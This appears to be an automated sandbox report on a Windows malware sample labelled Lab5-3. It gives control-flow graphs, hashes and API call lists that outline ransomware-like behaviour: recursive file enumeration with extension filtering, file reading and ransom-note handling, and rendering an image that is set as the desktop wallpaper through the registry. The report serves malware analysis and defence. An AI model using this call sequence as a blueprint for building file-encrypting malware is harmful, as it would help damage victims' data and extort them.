                                                                                                            • Instruction ID: 977a8b157154bdf697ba0ca944fec47ba57e436572ee9725ca2a7bb8ba4eeb95
                                                                                                            • Opcode Fuzzy Hash: ee466e4a312c861c1ef558da750f235434c80703367bf4d8034a7777c82412f6
                                                                                                            • Instruction Fuzzy Hash: 403155356012099BCB24ABA4CC05BEBB374FF44304F548169F915A7290EB345E54CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 183 41a740-41a77e CoInitializeEx call 407240 186 41a780-41a793 183->186 186->186 187 41a795-41a7b9 call 41a570 186->187 190 41a89b-41a89d 187->190 191 41a7bf-41a7c1 187->191 192 41a8a7-41a8a9 190->192 193 41a89f-41a8a2 190->193 194 41a8d4-41a8d9 191->194 195 41a7c7-41a7f9 call 407510 call 406d00 call 407640 191->195 196 41a8b3-41a8b7 192->196 197 41a8ab-41a8ae 192->197 193->192 194->196 206 41a800-41a812 195->206 199 41a8b9 CoUninitialize 196->199 200 41a8bf-41a8cc 196->200 197->196 199->200 206->206 207 41a814-41a837 206->207 207->190 209 41a839-41a850 call 407b20 207->209 212 41a852-41a864 209->212 212->212 213 41a866-41a88a call 41a570 212->213 213->190 216 41a88c-41a88e 213->216 217 41a890-41a894 216->217 218 41a8cd-41a8d2 216->218 219 41a899 217->219 218->190 219->190
                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,76F02B40,00000030,74DF0F10), ref: 0041A75E
                                                                                                            • CoUninitialize.OLE32(?,00416EF2), ref: 0041A8B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitializeUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3442037557-0
                                                                                                            • Opcode ID: 75d1ce0f7da6512f72eb881d7d8dde762eacffed1e2b2d5fde0ceee3b02483ad
                                                                                                            • Instruction ID: 5c7d73da7c489dfe7e8983f04833fd78e00bbd8d44271b3a0a943460dfdf4da4
                                                                                                            • Opcode Fuzzy Hash: 75d1ce0f7da6512f72eb881d7d8dde762eacffed1e2b2d5fde0ceee3b02483ad
                                                                                                            • Instruction Fuzzy Hash: 32519431D001269BCB11EFA5C855AEFF7B4EF44310F1541BAE809AB321D7389E95CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 161 41aa00-41aa21 GetCurrentProcess OpenProcessToken 162 41aa23-41aa41 GetTokenInformation 161->162 163 41aa45-41aa4a 161->163 162->163 164 41aa53-41aa59 163->164 165 41aa4c-41aa4d FindCloseChangeNotification 163->165 165->164
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 0041AA12
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0041AA19
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0041AA39
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0041AA4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406157124-0
                                                                                                            • Opcode ID: d92ac039da7aa32bc7706e49e5aac3a5b0418173c2370981066ef77299e24d90
                                                                                                            • Instruction ID: 4317f66145c16bb89c240afb23f47518667b00316ab38bca230fb5d7eb3fb0ab
                                                                                                            • Opcode Fuzzy Hash: d92ac039da7aa32bc7706e49e5aac3a5b0418173c2370981066ef77299e24d90
                                                                                                            • Instruction Fuzzy Hash: 9EF0F971A00218BBDB10DFA1DD09AEEBBBCEF08751F0080A5BA04E2250D7309A04DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 166 41a570-41a58c call 412550 169 41a693-41a6a2 166->169 170 41a592-41a59a 166->170 171 41a5a0-41a5a9 170->171 171->171 172 41a5ab-41a5d0 call 407040 171->172 175 41a5d3-41a603 172->175 175->175 176 41a605-41a616 175->176 177 41a620-41a62e 176->177 177->177 178 41a630 177->178 179 41a632-41a63b 178->179 179->179 180 41a63d-41a648 179->180 181 41a650-41a65a 180->181 181->181 182 41a65c-41a692 CoGetObject 181->182
                                                                                                            APIs
                                                                                                            • CoGetObject.OLE32(?,00000024,00423AC8,00416EF2), ref: 0041A67A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object
                                                                                                            • String ID: $
                                                                                                            • API String ID: 2936123098-3993045852
                                                                                                            • Opcode ID: 8a1888423f37d76d993308067c70f46fd8987dcfb587da3d5d0c773fdefdde38
                                                                                                            • Instruction ID: 0f670712e7167a286784861100dc4a4cf3fe297cfda1340731918d3eac694431
                                                                                                            • Opcode Fuzzy Hash: 8a1888423f37d76d993308067c70f46fd8987dcfb587da3d5d0c773fdefdde38
                                                                                                            • Instruction Fuzzy Hash: 763121359011188FCB20DF68C4986FAFBF5EF49314F08419AD889AB251EB345E04CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 220 410530-41058e wsprintfW FindFirstFileExW 221 410594-41125c 220->221 222 411a1c-411a22 220->222 223 411263-41126e 221->223 224 411270-41127a 223->224 225 411294-41129b 223->225 226 41128b-41128e 224->226 227 41127c-411284 224->227 228 4112a1-4112b3 lstrcmpiW 225->228 229 411527-411532 225->229 226->225 233 411a02-411a0f FindNextFileW 226->233 227->225 230 411286 227->230 228->233 234 4112b9-4112cb lstrcmpiW 228->234 231 411960-41196b 229->231 232 411538-411540 229->232 230->233 236 411970-41197e 231->236 232->232 237 411542-411545 232->237 233->223 235 411a15-411a16 FindClose 233->235 234->233 238 4112d1-4112e3 lstrcmpiW 234->238 235->222 236->236 239 411980-411993 PathAddBackslashW 236->239 237->231 240 41154b-41155c PathFindExtensionW 237->240 238->233 241 4112e9-4112fb lstrcmpiW 238->241 242 411995-41199e 239->242 243 411562-411567 240->243 244 4118b8-4118ca lstrcmpiW 240->244 241->233 245 411301-411313 lstrcmpiW 241->245 242->242 246 4119a0-4119ab 242->246 243->244 247 41156d 243->247 248 4118d0-4118e2 lstrcmpiW 244->248 249 4119fc 244->249 245->233 250 411319-41132b lstrcmpiW 245->250 252 4119b0-4119ba 246->252 253 411570-411578 247->253 248->249 254 4118e8-4118fa lstrcmpiW 248->254 249->233 250->233 251 411331-411340 lstrcmpiW 250->251 251->233 256 411346-411358 lstrcmpiW 251->256 252->252 257 4119bc-4119d2 252->257 253->253 258 41157a-41157c 253->258 254->249 255 411900-411912 lstrcmpiW 254->255 255->249 259 411918-41192a lstrcmpiW 255->259 256->233 260 41135e-411370 lstrcmpiW 256->260 261 4119d4-4119d6 257->261 262 4119f9 257->262 258->244 263 411582-41158b lstrcmpiW 258->263 259->249 264 411930-411942 lstrcmpiW 259->264 260->233 265 411376-411388 lstrcmpiW 260->265 266 4119d8-4119ec SetFileAttributesW 261->266 267 4119ee-4119f4 call 419500 261->267 262->249 263->249 268 411591-41159a lstrcmpiW 263->268 264->249 270 411948-41195a lstrcmpiW 264->270 265->233 271 41138e-4113a0 lstrcmpiW 265->271 266->262 266->267 267->262 268->249 269 4115a0-4115a9 lstrcmpiW 268->269 269->249 273 4115af-4115b8 lstrcmpiW 269->273 270->231 270->249 271->233 274 4113a6-4113b8 lstrcmpiW 271->274 273->249 275 4115be-4115c7 lstrcmpiW 273->275 274->233 276 4113be-4113d0 lstrcmpiW 274->276 275->249 277 4115cd-4115d9 lstrcmpiW 275->277 276->233 278 4113d6-4113e8 lstrcmpiW 276->278 277->249 279 4115df-4115e8 lstrcmpiW 277->279 278->233 280 4113ee-411400 lstrcmpiW 278->280 279->249 281 4115ee-4115f7 lstrcmpiW 279->281 280->233 282 411406-411418 lstrcmpiW 280->282 281->249 283 4115fd-411606 lstrcmpiW 281->283 282->233 284 41141e-411430 lstrcmpiW 282->284 283->249 285 41160c-411618 lstrcmpiW 283->285 284->233 286 411436-411448 lstrcmpiW 284->286 285->249 287 41161e-41162a lstrcmpiW 285->287 286->233 288 41144e-411460 lstrcmpiW 286->288 287->249 289 411630-41163c lstrcmpiW 287->289 288->233 290 411466-411478 lstrcmpiW 288->290 289->249 291 411642-41164e lstrcmpiW 289->291 290->233 292 41147e-411490 lstrcmpiW 290->292 291->249 293 411654-411660 lstrcmpiW 291->293 292->233 294 411496-4114a8 lstrcmpiW 292->294 293->249 296 411666-411672 lstrcmpiW 293->296 294->233 295 4114ae-4114c0 lstrcmpiW 294->295 295->233 297 4114c6-4114d8 lstrcmpiW 295->297 296->249 298 411678-411684 lstrcmpiW 296->298 297->233 299 4114de-4114f0 lstrcmpiW 297->299 298->249 300 41168a-411696 lstrcmpiW 298->300 299->233 301 4114f6-411522 wsprintfW call 410530 299->301 300->249 302 41169c-4116a8 lstrcmpiW 300->302 301->233 302->249 303 4116ae-4116ba lstrcmpiW 302->303 303->249 305 4116c0-4116cc lstrcmpiW 303->305 305->249 307 4116d2-4116de lstrcmpiW 305->307 307->249 308 4116e4-4116f0 lstrcmpiW 307->308 308->249 309 4116f6-411702 lstrcmpiW 308->309 309->249 310 411708-411714 lstrcmpiW 309->310 310->249 311 41171a-411726 lstrcmpiW 310->311 311->249 312 41172c-411738 lstrcmpiW 311->312 312->249 313 41173e-41174a lstrcmpiW 312->313 313->249 314 411750-41175c lstrcmpiW 313->314 314->249 315 411762-41176e lstrcmpiW 314->315 315->249 316 411774-411780 lstrcmpiW 315->316 316->249 317 411786-411792 lstrcmpiW 316->317 317->249 318 411798-4117a4 lstrcmpiW 317->318 318->249 319 4117aa-4117b6 lstrcmpiW 318->319 319->249 320 4117bc-4117c8 lstrcmpiW 319->320 320->249 321 4117ce-4117da lstrcmpiW 320->321 321->249 322 4117e0-4117ec lstrcmpiW 321->322 322->249 323 4117f2-4117fe lstrcmpiW 322->323 323->249 324 411804-411810 lstrcmpiW 323->324 324->249 325 411816-411822 lstrcmpiW 324->325 325->249 326 411828-411834 lstrcmpiW 325->326 326->249 327 41183a-411846 lstrcmpiW 326->327 327->249 328 41184c-411858 lstrcmpiW 327->328 328->249 329 41185e-41186a lstrcmpiW 328->329 329->249 330 411870-41187c lstrcmpiW 329->330 330->249 331 411882-41188e lstrcmpiW 330->331 331->249 332 411894-4118a0 lstrcmpiW 331->332 332->249 333 4118a6-4118b2 lstrcmpiW 332->333 333->244 333->249
                                                                                                            APIs
                                                                                                            • wsprintfW.USER32 ref: 00410561
                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,74DF3340), ref: 00410580
                                                                                                            • lstrcmpiW.KERNEL32(?,00770024,?,?,74DF3340), ref: 004112AF
                                                                                                            • lstrcmpiW.KERNEL32(?,006E0069,?,?,74DF3340), ref: 004112C7
                                                                                                            • lstrcmpiW.KERNEL32(?,0073006D,?,?,74DF3340), ref: 004112DF
                                                                                                            • lstrcmpiW.KERNEL32(?,00720024,?,?,74DF3340), ref: 004112F7
                                                                                                            • lstrcmpiW.KERNEL32(?,00770024,?,?,74DF3340), ref: 0041130F
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0074,?,?,74DF3340), ref: 00411327
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0062,?,?,74DF3340), ref: 0041133C
                                                                                                            • lstrcmpiW.KERNEL32(?,00790073,?,?,74DF3340), ref: 00411354
                                                                                                            • lstrcmpiW.KERNEL32(?,00650070,?,?,74DF3340), ref: 0041136C
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0067,?,?,74DF3340), ref: 00411384
                                                                                                            • lstrcmpiW.KERNEL32(?,00700061,?,?,74DF3340), ref: 0041139C
                                                                                                            • lstrcmpiW.KERNEL32(?,00690077,?,?,74DF3340), ref: 004113B4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690077,?,?,74DF3340), ref: 004113CC
                                                                                                            • lstrcmpiW.KERNEL32(?,00700061,?,?,74DF3340), ref: 004113E4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690057,?,?,74DF3340), ref: 004113FC
                                                                                                            • lstrcmpiW.KERNEL32(?,0073004D,?,?,74DF3340), ref: 00411414
                                                                                                            • lstrcmpiW.KERNEL32(?,0069004D,?,?,74DF3340), ref: 0041142C
                                                                                                            • lstrcmpiW.KERNEL32(?,006C0041,?,?,74DF3340), ref: 00411444
                                                                                                            • lstrcmpiW.KERNEL32(?,006F006D,?,?,74DF3340), ref: 0041145C
                                                                                                            • lstrcmpiW.KERNEL32(?,0069004D,?,?,74DF3340), ref: 00411474
                                                                                                            • lstrcmpiW.KERNEL32(?,0069006D,?,?,74DF3340), ref: 0041148C
                                                                                                            • lstrcmpiW.KERNEL32(?,006E0049,?,?,74DF3340), ref: 004114A4
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0063,?,?,74DF3340), ref: 004114BC
                                                                                                            • lstrcmpiW.KERNEL32(?,0070006F,?,?,74DF3340), ref: 004114D4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690057,?,?,74DF3340), ref: 004114EC
                                                                                                            • wsprintfW.USER32 ref: 0041150E
                                                                                                            • PathFindExtensionW.SHLWAPI(?,?,?,74DF3340), ref: 00411552
                                                                                                            • lstrcmpiW.KERNEL32(0033002E,00000000,?,?,74DF3340), ref: 00411587
                                                                                                            • lstrcmpiW.KERNEL32(0063002E,00000000,?,?,74DF3340), ref: 00411596
                                                                                                            • lstrcmpiW.KERNEL32(0065002E,00000000,?,?,74DF3340), ref: 004115A5
                                                                                                            • lstrcmpiW.KERNEL32(0061002E,00000000,?,?,74DF3340), ref: 004115B4
                                                                                                            • lstrcmpiW.KERNEL32(0061002E,00000000,?,?,74DF3340), ref: 004115C3
                                                                                                            • lstrcmpiW.KERNEL32(0074002E,00000000,?,?,74DF3340), ref: 004115D5
                                                                                                            • lstrcmpiW.KERNEL32(006D002E,00000000,?,?,74DF3340), ref: 004115E4
                                                                                                            • lstrcmpiW.KERNEL32(006D002E,00000000,?,?,74DF3340), ref: 004115F3
                                                                                                            • lstrcmpiW.KERNEL32(0063002E,00000000,?,?,74DF3340), ref: 00411602
                                                                                                            • lstrcmpiW.KERNEL32(0064002E,00000000,?,?,74DF3340), ref: 00411614
                                                                                                            • lstrcmpiW.KERNEL32(006E002E,00000000,?,?,74DF3340), ref: 00411626
                                                                                                            • lstrcmpiW.KERNEL32(0064002E,00000000,?,?,74DF3340), ref: 00411638
                                                                                                            • FindNextFileW.KERNEL32(?,00000010,?,?,74DF3340), ref: 00411A0A
                                                                                                            • FindClose.KERNEL32(?,?,?,74DF3340), ref: 00411A16
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpi$Find$Filewsprintf$CloseExtensionFirstNextPath
                                                                                                            • String ID: $ $ $$$$$$$%$%$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$8$A$I$J$M$M$M$M$N$R$T$W$W$\$\$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$g$g$g$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$w$w$w$w$w$x$x$x$y$y$z
                                                                                                            • API String ID: 3876518549-3246327213
                                                                                                            • Opcode ID: fad5769bdeeaaa854bd172f9bd567533182c85b4d3466b83eaa9fc9f7b442eb4
                                                                                                            • Instruction ID: c9eea26188da315aa5ebd8ed11a5a99a12937e69108b06112e0ace7fca278374
                                                                                                            • Opcode Fuzzy Hash: fad5769bdeeaaa854bd172f9bd567533182c85b4d3466b83eaa9fc9f7b442eb4
                                                                                                            • Instruction Fuzzy Hash: 10B2ECB5C0136ADADF20DF919C58BDEBAB9AF04744F0041D9960CA7211DBB99BC8CF64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 334 419500-419949 PathFindExtensionW 335 419950-419959 334->335 336 419974-419979 335->336 337 41995b-419972 lstrcmpiW 335->337 338 419980-41999e CreateFileW 336->338 337->335 337->336 339 4199a0-4199a8 338->339 340 4199d9-419a66 GlobalAlloc wsprintfW NtSetInformationFile 338->340 343 419acb-419ad3 339->343 344 4199ae-4199bb call 417880 339->344 341 419ac4-419ac5 NtClose 340->341 342 419a68-419a79 GlobalAlloc 340->342 341->343 342->341 345 419a7b-419ab4 NtQueryInformationFile 342->345 352 4199cd-4199d0 344->352 353 4199bd-4199c7 call 4127a0 344->353 347 419ad4-419af4 345->347 348 419ab6-419ac2 GlobalFree * 2 345->348 350 419af6 347->350 351 419afd-419b60 call 412920 * 2 ReadFile 347->351 348->341 350->348 355 419af8-419afb 350->355 362 419b91-419bac call 417f20 351->362 363 419b62-419b6d 351->363 352->343 354 4199d6-4199d7 352->354 353->343 353->352 354->338 355->348 355->351 367 419bc1-419bcc 362->367 368 419bae 362->368 363->362 364 419b6f-419b90 GlobalFree * 2 NtClose 363->364 369 419bb4-419bbf Sleep 368->369 369->367 369->369
                                                                                                            APIs
                                                                                                            • PathFindExtensionW.SHLWAPI(?,74DF3530,00000001,74DF3340), ref: 00419512
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,74DF3530,00000001,74DF3340), ref: 0041995D
                                                                                                            • CreateFileW.KERNEL32(?,C0010000,00000000,00000000,00000003,50000000,00000000,?,74DF3530,00000001,74DF3340), ref: 00419993
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000020A,?,74DF3530,00000001,74DF3340), ref: 004199EB
                                                                                                            • wsprintfW.USER32 ref: 00419A3C
                                                                                                            • NtSetInformationFile.NTDLL ref: 00419A5E
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00040068,?,?,74DF3340), ref: 00419A6F
                                                                                                            • NtQueryInformationFile.NTDLL ref: 00419AAC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00419ABD
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00419AC2
                                                                                                            • NtClose.NTDLL ref: 00419AC5
                                                                                                            • ReadFile.KERNEL32(?,00000034,00000010,00000000,00000000,00040044,00000010,00040034,00000010,?,?,74DF3340), ref: 00419B52
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00419B76
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00419B7B
                                                                                                            • NtClose.NTDLL ref: 00419B7E
                                                                                                              • Part of subcall function 00417F20: PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00417F57
                                                                                                              • Part of subcall function 00417F20: wsprintfW.USER32 ref: 00417FBB
                                                                                                              • Part of subcall function 00417F20: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,50000000,00000000), ref: 00417FDD
                                                                                                              • Part of subcall function 00417F20: NtSetInformationFile.NTDLL ref: 00417FFF
                                                                                                              • Part of subcall function 00417F20: NtClose.NTDLL ref: 0041800A
                                                                                                              • Part of subcall function 00417F20: MessageBoxA.USER32(00000000,Unable to bind NOTE file IOCP %S error: %d,00000000,00000000), ref: 0041801B
                                                                                                            • Sleep.KERNEL32(00000003,?,?,74DF3340), ref: 00419BB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Global$Free$CloseInformation$AllocCreatePathwsprintf$ExtensionFindMessageQueryReadRemoveSleepSpeclstrcmpi
                                                                                                            • String ID: %$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$a$a$b$b$b$b$b$b$b$b$b$b$c$d$d$d$d$e$e$e$i$i$i$i$i$k$k$l$m$m$o$p$q$q$q$q$r$r$r$s$w$w$y$z
                                                                                                            • API String ID: 1477299043-472121766
                                                                                                            • Opcode ID: 913577b4ee93d20265f4c7c65be8f56033e08dbfc5680af08a428d25e4b9c348
                                                                                                            • Instruction ID: 3e4d32bfebab4aae2a6fd96daafcc9e24190bb3a7c50d78191816eb1e669ce2a
                                                                                                            • Opcode Fuzzy Hash: 913577b4ee93d20265f4c7c65be8f56033e08dbfc5680af08a428d25e4b9c348
                                                                                                            • Instruction Fuzzy Hash: 4802E2B4941368DAEB20CF61D888BDEBBB5FF08704F0041EAD549A7251D7B55AC8CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 370 411e40-411e9a GdiplusStartup 371 411ea0-411eb8 GetSystemMetrics * 2 370->371 372 4123c4-4123cc 370->372 371->372 373 411ebe-411ec0 371->373 373->372 374 411ec6-411f2b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext call 4014d0 373->374 377 411f30-411f43 374->377 377->377 378 411f45-411fee call 401210 GdipCreateStringFormat GdipSetStringFormatAlign 377->378 381 411ff0-411ff4 378->381 382 411ff6-412004 GdipSetStringFormatLineAlign 378->382 381->382 383 41200c-41200e 381->383 384 412013-412062 call 401160 GdipFillRectangle 382->384 385 412006-41200a 382->385 386 412151-412181 GdipDeleteStringFormat GdipDeleteFont GdipDeleteGraphics GdipDisposeImage 383->386 389 412064-412068 384->389 390 41206a-41207f malloc 384->390 385->383 385->384 389->390 391 412087-412089 389->391 392 412081 390->392 393 41208e-41212a call 401320 wsprintfW call 401160 call 4011b0 390->393 394 412148-41214f GdipDeleteBrush 391->394 392->391 401 412182-41219b call 401540 393->401 402 41212c-412133 free 393->402 394->386 407 4121a0-4121b2 401->407 403 412136 402->403 405 412138-412144 GdipDeleteBrush 403->405 405->394 407->407 408 4121b4-4121cc call 4123d0 407->408 408->403 411 4121d2-412216 GetTempPathW GetTempFileNameW call 4015f0 408->411 414 412218-41222a 411->414 414->414 415 41222c-412262 wsprintfW GdipSaveImageToFile 414->415 416 412264 415->416 417 41226a-41227b 415->417 416->403 416->417 418 412280-412292 417->418 418->418 419 412294-4122bf 418->419 420 4122c4-4122cc 419->420 421 4122d4-4122fc 420->421 422 4122ce-4122d2 420->422 423 412304-412310 421->423 422->420 423->423 424 412312-412331 RegOpenKeyA 423->424 424->403 425 412337-412368 call 412570 RegSetValueExA 424->425 425->403 428 41236e-412396 call 412570 RegSetValueExA 425->428 428->403 431 41239c-4123bf RegCloseKey SystemParametersInfoW 428->431 431->405
                                                                                                            APIs
                                                                                                            • GdiplusStartup.GDIPLUS ref: 00411E92
                                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00411EA8
                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00411EB2
                                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(00000000,00000000,00000000,0026200A,00000000,?), ref: 00411EDE
                                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,?), ref: 00411EFA
                                                                                                            • GdipCreateStringFormat.GDIPLUS(0000000A,0000000A,?), ref: 00411FD6
                                                                                                            • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 00411FE6
                                                                                                            • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 00411FFC
                                                                                                            • GdipFillRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?), ref: 00412054
                                                                                                            • malloc.MSVCRT ref: 00412072
                                                                                                            • wsprintfW.USER32 ref: 004120D0
                                                                                                            • free.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 0041212D
                                                                                                            • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412142
                                                                                                            • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 0041214F
                                                                                                            • GdipDeleteStringFormat.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412155
                                                                                                            • GdipDeleteFont.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412162
                                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412169
                                                                                                            • GdipDisposeImage.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412173
                                                                                                              • Part of subcall function 00401160: GdipCreateLineBrushFromRect.GDIPLUS(?,?,?,?,00000000,00000000,0000000A,?,?,00412040,?,?,?,00000002), ref: 00401192
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 004121DF
                                                                                                            • GetTempFileNameW.KERNEL32(?,00000012,00000012,?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 004121F7
                                                                                                            • wsprintfW.USER32 ref: 0041223C
                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,0000000C,?,?,?,?,?,?,?,?,?,?,?), ref: 0041225A
                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00412329
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00412364
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00412392
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004123A0
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 004123B4
                                                                                                            Strings
                                                                                                            Memory Dump Source
